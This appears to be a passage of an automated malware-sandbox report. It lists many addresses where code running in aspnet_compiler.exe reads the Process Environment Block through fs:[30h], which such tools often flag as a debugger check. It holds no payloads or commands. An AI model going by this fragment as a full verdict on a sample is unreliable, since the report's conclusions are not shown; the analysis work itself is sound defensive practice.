Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE016 mov eax, dword ptr fs:[00000030h]	16_2_015CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE016 mov eax, dword ptr fs:[00000030h]	16_2_015CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE016 mov eax, dword ptr fs:[00000030h]	16_2_015CE016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167903E mov eax, dword ptr fs:[00000030h]	16_2_0167903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167903E mov eax, dword ptr fs:[00000030h]	16_2_0167903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167903E mov eax, dword ptr fs:[00000030h]	16_2_0167903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167903E mov eax, dword ptr fs:[00000030h]	16_2_0167903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01634000 mov ecx, dword ptr fs:[00000030h]	16_2_01634000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AA020 mov eax, dword ptr fs:[00000030h]	16_2_015AA020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AC020 mov eax, dword ptr fs:[00000030h]	16_2_015AC020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016360E0 mov eax, dword ptr fs:[00000030h]	16_2_016360E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D90DB mov eax, dword ptr fs:[00000030h]	16_2_015D90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov ecx, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov ecx, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov ecx, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov ecx, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C70C0 mov eax, dword ptr fs:[00000030h]	16_2_015C70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162D0C0 mov eax, dword ptr fs:[00000030h]	16_2_0162D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0162D0C0 mov eax, dword ptr fs:[00000030h]	16_2_0162D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AC0F0 mov eax, dword ptr fs:[00000030h]	16_2_015AC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F20F0 mov ecx, dword ptr fs:[00000030h]	16_2_015F20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016850D9 mov eax, dword ptr fs:[00000030h]	16_2_016850D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B80E9 mov eax, dword ptr fs:[00000030h]	16_2_015B80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D50E4 mov eax, dword ptr fs:[00000030h]	16_2_015D50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D50E4 mov ecx, dword ptr fs:[00000030h]	16_2_015D50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AA0E3 mov ecx, dword ptr fs:[00000030h]	16_2_015AA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016320DE mov eax, dword ptr fs:[00000030h]	16_2_016320DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E909C mov eax, dword ptr fs:[00000030h]	16_2_015E909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016480A8 mov eax, dword ptr fs:[00000030h]	16_2_016480A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B5096 mov eax, dword ptr fs:[00000030h]	16_2_015B5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DD090 mov eax, dword ptr fs:[00000030h]	16_2_015DD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DD090 mov eax, dword ptr fs:[00000030h]	16_2_015DD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B208A mov eax, dword ptr fs:[00000030h]	16_2_015B208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AD08D mov eax, dword ptr fs:[00000030h]	16_2_015AD08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016760B8 mov eax, dword ptr fs:[00000030h]	16_2_016760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016760B8 mov ecx, dword ptr fs:[00000030h]	16_2_016760B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166F367 mov eax, dword ptr fs:[00000030h]	16_2_0166F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9353 mov eax, dword ptr fs:[00000030h]	16_2_015A9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9353 mov eax, dword ptr fs:[00000030h]	16_2_015A9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AD34C mov eax, dword ptr fs:[00000030h]	16_2_015AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AD34C mov eax, dword ptr fs:[00000030h]	16_2_015AD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0165437C mov eax, dword ptr fs:[00000030h]	16_2_0165437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01685341 mov eax, dword ptr fs:[00000030h]	16_2_01685341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01632349 mov eax, dword ptr fs:[00000030h]	16_2_01632349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B7370 mov eax, dword ptr fs:[00000030h]	16_2_015B7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B7370 mov eax, dword ptr fs:[00000030h]	16_2_015B7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B7370 mov eax, dword ptr fs:[00000030h]	16_2_015B7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167A352 mov eax, dword ptr fs:[00000030h]	16_2_0167A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163035C mov eax, dword ptr fs:[00000030h]	16_2_0163035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163035C mov eax, dword ptr fs:[00000030h]	16_2_0163035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163035C mov eax, dword ptr fs:[00000030h]	16_2_0163035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163035C mov ecx, dword ptr fs:[00000030h]	16_2_0163035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163035C mov eax, dword ptr fs:[00000030h]	16_2_0163035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163035C mov eax, dword ptr fs:[00000030h]	16_2_0163035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AC310 mov ecx, dword ptr fs:[00000030h]	16_2_015AC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167132D mov eax, dword ptr fs:[00000030h]	16_2_0167132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167132D mov eax, dword ptr fs:[00000030h]	16_2_0167132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D0310 mov ecx, dword ptr fs:[00000030h]	16_2_015D0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EA30B mov eax, dword ptr fs:[00000030h]	16_2_015EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EA30B mov eax, dword ptr fs:[00000030h]	16_2_015EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015EA30B mov eax, dword ptr fs:[00000030h]	16_2_015EA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163930B mov eax, dword ptr fs:[00000030h]	16_2_0163930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163930B mov eax, dword ptr fs:[00000030h]	16_2_0163930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0163930B mov eax, dword ptr fs:[00000030h]	16_2_0163930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A7330 mov eax, dword ptr fs:[00000030h]	16_2_015A7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015DF32A mov eax, dword ptr fs:[00000030h]	16_2_015DF32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166F3E6 mov eax, dword ptr fs:[00000030h]	16_2_0166F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016853FC mov eax, dword ptr fs:[00000030h]	16_2_016853FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BA3C0 mov eax, dword ptr fs:[00000030h]	16_2_015BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BA3C0 mov eax, dword ptr fs:[00000030h]	16_2_015BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BA3C0 mov eax, dword ptr fs:[00000030h]	16_2_015BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BA3C0 mov eax, dword ptr fs:[00000030h]	16_2_015BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BA3C0 mov eax, dword ptr fs:[00000030h]	16_2_015BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015BA3C0 mov eax, dword ptr fs:[00000030h]	16_2_015BA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B83C0 mov eax, dword ptr fs:[00000030h]	16_2_015B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B83C0 mov eax, dword ptr fs:[00000030h]	16_2_015B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B83C0 mov eax, dword ptr fs:[00000030h]	16_2_015B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B83C0 mov eax, dword ptr fs:[00000030h]	16_2_015B83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E63FF mov eax, dword ptr fs:[00000030h]	16_2_015E63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166C3CD mov eax, dword ptr fs:[00000030h]	16_2_0166C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE3F0 mov eax, dword ptr fs:[00000030h]	16_2_015CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE3F0 mov eax, dword ptr fs:[00000030h]	16_2_015CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015CE3F0 mov eax, dword ptr fs:[00000030h]	16_2_015CE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015C03E9 mov eax, dword ptr fs:[00000030h]	16_2_015C03E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166B3D0 mov ecx, dword ptr fs:[00000030h]	16_2_0166B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A8397 mov eax, dword ptr fs:[00000030h]	16_2_015A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A8397 mov eax, dword ptr fs:[00000030h]	16_2_015A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A8397 mov eax, dword ptr fs:[00000030h]	16_2_015A8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AE388 mov eax, dword ptr fs:[00000030h]	16_2_015AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AE388 mov eax, dword ptr fs:[00000030h]	16_2_015AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AE388 mov eax, dword ptr fs:[00000030h]	16_2_015AE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D438F mov eax, dword ptr fs:[00000030h]	16_2_015D438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D438F mov eax, dword ptr fs:[00000030h]	16_2_015D438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0168539D mov eax, dword ptr fs:[00000030h]	16_2_0168539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D33A5 mov eax, dword ptr fs:[00000030h]	16_2_015D33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0160739A mov eax, dword ptr fs:[00000030h]	16_2_0160739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0160739A mov eax, dword ptr fs:[00000030h]	16_2_0160739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E33A0 mov eax, dword ptr fs:[00000030h]	16_2_015E33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E33A0 mov eax, dword ptr fs:[00000030h]	16_2_015E33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B6259 mov eax, dword ptr fs:[00000030h]	16_2_015B6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AA250 mov eax, dword ptr fs:[00000030h]	16_2_015AA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167D26B mov eax, dword ptr fs:[00000030h]	16_2_0167D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0167D26B mov eax, dword ptr fs:[00000030h]	16_2_0167D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01660274 mov eax, dword ptr fs:[00000030h]	16_2_01660274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E724D mov eax, dword ptr fs:[00000030h]	16_2_015E724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9240 mov eax, dword ptr fs:[00000030h]	16_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A9240 mov eax, dword ptr fs:[00000030h]	16_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01638243 mov eax, dword ptr fs:[00000030h]	16_2_01638243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01638243 mov ecx, dword ptr fs:[00000030h]	16_2_01638243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015D9274 mov eax, dword ptr fs:[00000030h]	16_2_015D9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F1270 mov eax, dword ptr fs:[00000030h]	16_2_015F1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015F1270 mov eax, dword ptr fs:[00000030h]	16_2_015F1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166B256 mov eax, dword ptr fs:[00000030h]	16_2_0166B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_0166B256 mov eax, dword ptr fs:[00000030h]	16_2_0166B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A826B mov eax, dword ptr fs:[00000030h]	16_2_015A826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B4260 mov eax, dword ptr fs:[00000030h]	16_2_015B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B4260 mov eax, dword ptr fs:[00000030h]	16_2_015B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015B4260 mov eax, dword ptr fs:[00000030h]	16_2_015B4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_01685227 mov eax, dword ptr fs:[00000030h]	16_2_01685227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E7208 mov eax, dword ptr fs:[00000030h]	16_2_015E7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015E7208 mov eax, dword ptr fs:[00000030h]	16_2_015E7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015A823B mov eax, dword ptr fs:[00000030h]	16_2_015A823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB2D3 mov eax, dword ptr fs:[00000030h]	16_2_015AB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB2D3 mov eax, dword ptr fs:[00000030h]	16_2_015AB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_015AB2D3 mov eax, dword ptr fs:[00000030h]	16_2_015AB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016852E2 mov eax, dword ptr fs:[00000030h]	16_2_016852E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016612ED mov eax, dword ptr fs:[00000030h]	16_2_016612ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 16_2_016612ED mov eax, dword ptr fs:[00000030h]	16_2_016612ED
